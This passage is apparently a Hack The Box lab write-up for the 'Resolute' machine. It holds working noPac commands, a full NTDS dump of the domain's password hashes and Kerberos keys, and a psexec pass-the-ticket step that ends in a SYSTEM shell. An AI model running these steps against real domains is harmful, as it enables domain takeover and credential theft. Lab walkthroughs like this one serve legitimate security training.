CVE-2021-42278/CVE-2021-42287
The target system might be vulnerable to the CVE-2021-42278 +CVE-2021-42287 chain attack given the fact it is relatively older and doesn’t seem to have patch installed for it
By default, any domain user has the SeMachineAccountPrivilege privilege enabled and I have already confirmed that the melanie user has the privileges enabled
Additionally, users with the privilege can add up to 10 devices to the domain. This can be checked both locally and remotely
*evil-winrm* ps c:\> Get-ADObject -Identity (Get-ADDomain).DistinguishedName -Properties ms-DS-MachineAccountQuota
distinguishedname : DC=megabank,DC=local
ms-ds-machineaccountquota : 10
name : megabank
objectclass : domainDNS
objectguid : b4e0e946-cbe7-42b7-8fa0-5c4cec2fe5aaNotice the ms-DS-MachineAccountQuota attribute set to 10
┌──(kali㉿kali)-[~/…/htb/labs/resolute/nopac]
└─$ ldapsearch -x -h ldap://megabank.local:389 -D 'melanie@megabank.local' -w 'Welcome123!' -b 'DC=MEGABANK,DC=LOCAL' -LLL | grep -w ms-DS-MachineAccountQuota
ms-ds-machineaccountquota: 10Through ldapsearch, it can also be checked remotely
exploit (nopac)
The CVE-2021-42278 + CVE-2021-42287 chain attack (noPac) works by impersonating a domain controller through faking a computer account with the trailing $ sign
Testing
┌──(kali㉿kali)-[~/…/htb/labs/resolute/nopac]
└─$ cme smb $IP -d MEGABANK.LOCAL --kdcHost resolute.megabank.local -u melanie -p 'Welcome123!' -M nopac
smb 10.10.10.169 445 resolute [*] windows server 2016 standard 14393 x64 (name:RESOLUTE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:True)
smb 10.10.10.169 445 resolute [+] megabank.local\melanie:Welcome123!
NOPAC 10.10.10.169 445 RESOLUTE TGT with PAC size 1470
NOPAC 10.10.10.169 445 RESOLUTE TGT without PAC size 721
NOPAC 10.10.10.169 445 RESOLUTE
NOPAC 10.10.10.169 445 RESOLUTE VULNEABLE
nopac 10.10.10.169 445 resolute next step: https://github.com/Ridter/noPaccrackmapexec has a module available to test for the nopac exploit above As the result shown above, the target system is confirmed to be vulnerable
Exploitation
┌──(kali㉿kali)-[~/…/htb/labs/resolute/noPac]
└─$ python3 noPac.py 'megabank.local/melanie:Welcome123!' --impersonate administrator -dc-ip $IP -use-ldap -dump -just-dc
███ ██ ██████ ██████ █████ ██████
████ ██ ██ ██ ██ ██ ██ ██ ██
██ ██ ██ ██ ██ ██████ ███████ ██
██ ██ ██ ██ ██ ██ ██ ██ ██
██ ████ ██████ ██ ██ ██ ██████
[*] Current ms-DS-MachineAccountQuota = 10
[*] Selected Target resolute.megabank.local
[*] will try to impersonate administrator
[*] Adding Computer Account "WIN-2SJZIXAYU6P$"
[*] MachineAccount "WIN-2SJZIXAYU6P$" password = MTkoTJfLHzvP
[*] Successfully added machine account WIN-2SJZIXAYU6P$ with password MTkoTJfLHzvP.
[*] WIN-2SJZIXAYU6P$ object = CN=WIN-2SJZIXAYU6P,CN=Computers,DC=megabank,DC=local
[*] WIN-2SJZIXAYU6P$ sAMAccountName == resolute
[*] Saving a DC's ticket in resolute.ccache
[*] Reseting the machine account to WIN-2SJZIXAYU6P$
[*] Restored WIN-2SJZIXAYU6P$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Saving a user's ticket in administrator.ccache
[*] Rename ccache to administrator_resolute.megabank.local.ccache
[*] Attempting to del a computer with the name: WIN-2SJZIXAYU6P$
[-] Delete computer WIN-2SJZIXAYU6P$ Failed! Maybe the current user does not have permission.
[*] Pls make sure your choice hostname and the -dc-ip are same machine !!
[*] Exploiting..
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:fb3b106896cdaa8a08072775fbd9afe9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:49a9276d51927d3cd34a8ac69ae39c40:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
megabank.local\ryan:1105:aad3b435b51404eeaad3b435b51404ee:3f653cb103e005246bc95ceb2f56e30b:::
megabank.local\marko:1111:aad3b435b51404eeaad3b435b51404ee:8276510304cefe6e77c3a9e910ba3a6a:::
megabank.local\sunita:6601:aad3b435b51404eeaad3b435b51404ee:4e67de165ebd5e604d6580b15cfc61b2:::
megabank.local\abigail:6602:aad3b435b51404eeaad3b435b51404ee:3f67ccb851b02ac4ee9f91eeddf1cac7:::
megabank.local\marcus:6603:aad3b435b51404eeaad3b435b51404ee:d546df40747f48ece7e2be7349ec8f1b:::
megabank.local\sally:6604:aad3b435b51404eeaad3b435b51404ee:9d5a37664c09e08e8be59ca3e76c262f:::
megabank.local\fred:6605:aad3b435b51404eeaad3b435b51404ee:7be0fca1b4aec94356b86e4b1de06c4f:::
megabank.local\angela:6606:aad3b435b51404eeaad3b435b51404ee:07fe48603fa7ada83e62d14e54f45127:::
megabank.local\felicia:6607:aad3b435b51404eeaad3b435b51404ee:74dce6edc0eabd905d42e0a7225b80f3:::
megabank.local\gustavo:6608:aad3b435b51404eeaad3b435b51404ee:0b03061f9b79bf6642fe92aee0a109c6:::
megabank.local\ulf:6609:aad3b435b51404eeaad3b435b51404ee:f3dfd5c45de7a953c82fbe99749057c2:::
megabank.local\stevie:6610:aad3b435b51404eeaad3b435b51404ee:eb41b7464f302e573aaa697d191b5569:::
megabank.local\claire:6611:aad3b435b51404eeaad3b435b51404ee:72dc9d1d791307cf5217c8e39a88f56a:::
megabank.local\paulo:6612:aad3b435b51404eeaad3b435b51404ee:4e2d8cc79e15e601c099170a645483e6:::
megabank.local\steve:6613:aad3b435b51404eeaad3b435b51404ee:b8de802a1e7862c6e0e19be9c2baff0f:::
megabank.local\annette:6614:aad3b435b51404eeaad3b435b51404ee:2f9b8f25ec94dd46ecb071c27dc82905:::
megabank.local\annika:6615:aad3b435b51404eeaad3b435b51404ee:5d7226ebae151a224ada8add01bdc21c:::
megabank.local\per:6616:aad3b435b51404eeaad3b435b51404ee:b66616eb72209b81edded1fe63ae8806:::
megabank.local\claude:6617:aad3b435b51404eeaad3b435b51404ee:f059af81cb6022dc5de6389d4a6e6a65:::
megabank.local\melanie:10101:aad3b435b51404eeaad3b435b51404ee:e4a22d8e7bbec871b341c88c2e94cba2:::
megabank.local\zach:10102:aad3b435b51404eeaad3b435b51404ee:434927d08ddb971a8b14e407a58f6e9e:::
megabank.local\simon:10103:aad3b435b51404eeaad3b435b51404ee:25bc108c637a551f8b000054ea8ddc6e:::
megabank.local\naoki:10104:aad3b435b51404eeaad3b435b51404ee:07a1070c03b1a26e53d265d27ecb1a38:::
RESOLUTE$:1000:aad3b435b51404eeaad3b435b51404ee:4e1b4bd79a272c0fe91ec10b758672fd:::
MS02$:1104:aad3b435b51404eeaad3b435b51404ee:7b71dcfa93cf1f5d37d34497b632c890:::
WIN-2SJZIXAYU6P$:12101:aad3b435b51404eeaad3b435b51404ee:a19e361da6e84cc7a671440bf2fd3500:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:2c729d2a189d5ffdf4792a66eee8e7d37a6e5c37b57a722c307791e7a466f741
Administrator:aes128-cts-hmac-sha1-96:e175930b43cf0835cf361c9cb8d964b1
Administrator:des-cbc-md5:235e4979aeba1073
krbtgt:aes256-cts-hmac-sha1-96:25c34e568e89ccbc1435fbcd4a1067cf23629530d97656923a216b0de82dd333
krbtgt:aes128-cts-hmac-sha1-96:1dff59da1cf4b1c0fadd113dd2400d0b
krbtgt:des-cbc-md5:adcb106701349864
megabank.local\ryan:aes256-cts-hmac-sha1-96:1d5b6f6aaa4841a9b6fc727c114eafaf0b5cae266f2e47a81095cdce2ecc9f7c
megabank.local\ryan:aes128-cts-hmac-sha1-96:67e6a3eec4210a7c0341b72963da4f12
megabank.local\ryan:des-cbc-md5:62c279a8c1c10bd5
megabank.local\marko:aes256-cts-hmac-sha1-96:6ba81690c81b99f828a7d250e432722a95642c63ea201e8a6ba36db50116f6b2
megabank.local\marko:aes128-cts-hmac-sha1-96:7fa0f0b4a72a1ee50c5340ff5f2e7359
megabank.local\marko:des-cbc-md5:46b083b08a79e973
megabank.local\sunita:aes256-cts-hmac-sha1-96:1c31eaa2f2683cce009513f34b58ffcb880910ba9ae2a493a7850e3e1f55208b
megabank.local\sunita:aes128-cts-hmac-sha1-96:b055a012e88ad88a1478e913054d472c
megabank.local\sunita:des-cbc-md5:898ae62a8989832a
megabank.local\abigail:aes256-cts-hmac-sha1-96:a8473d8954d7f3b017561af651e3683eceb8adab27dad0d97a64fe9889c6c600
megabank.local\abigail:aes128-cts-hmac-sha1-96:c1882b7df861cc12bcf86b490793b8e1
megabank.local\abigail:des-cbc-md5:f4388a54e080d610
megabank.local\marcus:aes256-cts-hmac-sha1-96:ed97b881856e9f256976c4317270df2b0c383137f4a2d9289a30a0c8ac9568f0
megabank.local\marcus:aes128-cts-hmac-sha1-96:91e53044de3baa093817db78e7bfc957
megabank.local\marcus:des-cbc-md5:078c4adf98cbb943
megabank.local\sally:aes256-cts-hmac-sha1-96:f3f57f7f0f5ae1de03e946f01f641565a1744deb115e20095e1a48af7341c548
megabank.local\sally:aes128-cts-hmac-sha1-96:3db0cdd0bfa2b9388bfb98885affe537
megabank.local\sally:des-cbc-md5:c4c1f4e9ab98574f
megabank.local\fred:aes256-cts-hmac-sha1-96:f6125e4c00cf1c1c9f93b5f03578eef8edde13f858012caaf500a5f57ea4b1b8
megabank.local\fred:aes128-cts-hmac-sha1-96:6432e8085f207ad837038c6bd30d95b9
megabank.local\fred:des-cbc-md5:31310e1f8c68e907
megabank.local\angela:aes256-cts-hmac-sha1-96:fd77e01c6a2ad42d79d1ab13a8991ec4987d06c5087022983dcee3e288a4319d
megabank.local\angela:aes128-cts-hmac-sha1-96:e8a5bf3aef414ee84b69d0729d8bf055
megabank.local\angela:des-cbc-md5:01f889578c32cb91
megabank.local\felicia:aes256-cts-hmac-sha1-96:d6155ece9141d52abdd40504552296306af3b108034da7170737a2cf5fb6bcb8
megabank.local\felicia:aes128-cts-hmac-sha1-96:20baa9a112699e5d2751af868ab9aefc
megabank.local\felicia:des-cbc-md5:b331a80b3876c470
megabank.local\gustavo:aes256-cts-hmac-sha1-96:4d00b13243910022a07275bd88cd5b6dfca49f82f6b0200b7f990f527bdb482b
megabank.local\gustavo:aes128-cts-hmac-sha1-96:f454326d38c881899f246fa2e711d59f
megabank.local\gustavo:des-cbc-md5:291f1c2a754943ad
megabank.local\ulf:aes256-cts-hmac-sha1-96:e4663bb3849429da167fb460e9c3d15da93c1ce50d24641411500c4bf1b3962c
megabank.local\ulf:aes128-cts-hmac-sha1-96:ebdbf19e8b51bedec2de1babc1154e6f
megabank.local\ulf:des-cbc-md5:fe2ff1da6b6d73fb
megabank.local\stevie:aes256-cts-hmac-sha1-96:f308737f7c792ac1b74f3f6855cad1860b478c8afd906df1b4b14b21d858c5b7
megabank.local\stevie:aes128-cts-hmac-sha1-96:0192b45aa6e143b340b409a377c084f0
megabank.local\stevie:des-cbc-md5:e623166449498c85
megabank.local\claire:aes256-cts-hmac-sha1-96:3a8882538cd36730a38637b23c1ce296946b94a74410568343531dfb623153e2
megabank.local\claire:aes128-cts-hmac-sha1-96:782388d0700da184fe5d978551ae9078
megabank.local\claire:des-cbc-md5:296d944998b63138
megabank.local\paulo:aes256-cts-hmac-sha1-96:0407f0c1a2d50ac27a7f60dff7165aee3ce80f3789b4d1b1bfc3568e477371e2
megabank.local\paulo:aes128-cts-hmac-sha1-96:db3794331a5cac201f9cde86fe959eef
megabank.local\paulo:des-cbc-md5:52b97f7c94808cb3
megabank.local\steve:aes256-cts-hmac-sha1-96:c1eb8da00fe9a4df1e0e85f6eec06a00afa11a19a26116aca04360bf030d379e
megabank.local\steve:aes128-cts-hmac-sha1-96:f6c379343ad9cf7ad17ae5dc339bef87
megabank.local\steve:des-cbc-md5:dcb09780e59dd36b
megabank.local\annette:aes256-cts-hmac-sha1-96:3ef07851ad3a81a2ae88587f6b1268c080d59d3e41e07bd54e97d88d9a1c7541
megabank.local\annette:aes128-cts-hmac-sha1-96:2e238dc190585c1fe68b553f9dfc7738
megabank.local\annette:des-cbc-md5:2a688045d9a868cd
megabank.local\annika:aes256-cts-hmac-sha1-96:43a85bf8df3087cd197cddeb9916887b6cfbedca675f00c3991abb344e894256
megabank.local\annika:aes128-cts-hmac-sha1-96:9bfcad30e8fe505431432b65260f0722
megabank.local\annika:des-cbc-md5:ef468ce946eaf1e5
megabank.local\per:aes256-cts-hmac-sha1-96:7b338c02de23b91a7186fb8eef8a854b17df81cf261ef11a7c2ab6150eb7de52
megabank.local\per:aes128-cts-hmac-sha1-96:bb36d55a17fbb55def6f27a0f6d9f121
megabank.local\per:des-cbc-md5:8919b902678a4f2a
megabank.local\claude:aes256-cts-hmac-sha1-96:99dd9da983f3f1c645d1e4db5097428d6e98a5858a0dc26986a6b16771f81c74
megabank.local\claude:aes128-cts-hmac-sha1-96:bcb9376a3bcb7356700423970f187291
megabank.local\claude:des-cbc-md5:f2dcfe13ea290297
megabank.local\melanie:aes256-cts-hmac-sha1-96:d99fed082814833e7a128f4f82e425ad7e0ef9e30356fe944c1d7391954240dc
megabank.local\melanie:aes128-cts-hmac-sha1-96:7c08d66da82cff1b52ce762bf4bee3bb
megabank.local\melanie:des-cbc-md5:fdb99de3a704fe32
megabank.local\zach:aes256-cts-hmac-sha1-96:4295505ced2fa3a04a0c57ba8824756cb7344c050a23cb1dfe0c96e479c4dda7
megabank.local\zach:aes128-cts-hmac-sha1-96:32fb18cc45a6f6d250f1998e1edf9b91
megabank.local\zach:des-cbc-md5:735b1c37fb68e0a1
megabank.local\simon:aes256-cts-hmac-sha1-96:22c8f32ed5a42a8d09d8a033aaf17d9b6e94454a274e084d1d26c304b8e67260
megabank.local\simon:aes128-cts-hmac-sha1-96:b3936c2e62cb02642c634cf7433e13ed
megabank.local\simon:des-cbc-md5:4c5ef42370026d86
megabank.local\naoki:aes256-cts-hmac-sha1-96:2a3bc7723b6f0190a8d4b101488e2307ca844496a0f086ca9e3667fad5cb23a1
megabank.local\naoki:aes128-cts-hmac-sha1-96:6873a96fdb162feb50a0372333f71ba8
megabank.local\naoki:des-cbc-md5:3292262c7592ea16
RESOLUTE$:aes256-cts-hmac-sha1-96:cc77dc6227a1e9678f80f87b10f920e60615c1d5c012a59f8916c7b1435e4d2f
RESOLUTE$:aes128-cts-hmac-sha1-96:76e7df6560e7987260b6cb0c849030a4
RESOLUTE$:des-cbc-md5:9d9b326e7068fb3b
MS02$:aes256-cts-hmac-sha1-96:09481277b7203cba30eb72cdfd03384cab3ec47c76b4c9cdd90fd9fd30d09c6b
MS02$:aes128-cts-hmac-sha1-96:dbbad923e27b1099854233b8bfb890ee
MS02$:des-cbc-md5:e6806b490d0b83b3
WIN-2SJZIXAYU6P$:aes256-cts-hmac-sha1-96:9355563837538bf7cb4b8e360f519233c7d3d0879e4bda677b3720c2d4ed5f79
WIN-2SJZIXAYU6P$:aes128-cts-hmac-sha1-96:69eb0fb0ed0c131bb930777b46ebb41c
WIN-2SJZIXAYU6P$:des-cbc-md5:571af23ebcc43dad
[*] Cleaning up... Domain Level Compromise
Pass-the-ticket technique with the -k flag was not successful
Shelldrop
┌──(kali㉿kali)-[~/…/htb/labs/resolute/noPac]
└─$ KRB5CCNAME=administrator_resolute.megabank.local.ccache impacket-psexec megabank.local/administrator@resolute.megabank.local -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on resolute.megabank.local.....
[*] Found writable share ADMIN$
[*] Uploading file aIrwmyny.exe
[*] Opening SVCManager on resolute.megabank.local.....
[*] Creating service mXFJ on resolute.megabank.local.....
[*] Starting service mXFJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
Resolute
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . :
ipv4 address. . . . . . . . . . . : 10.10.10.169
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : 10.10.10.2
tunnel adapter isatap.{a20a4417-3dc7-47b7-8f00-87cc59d9f43f}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : System Level Compromise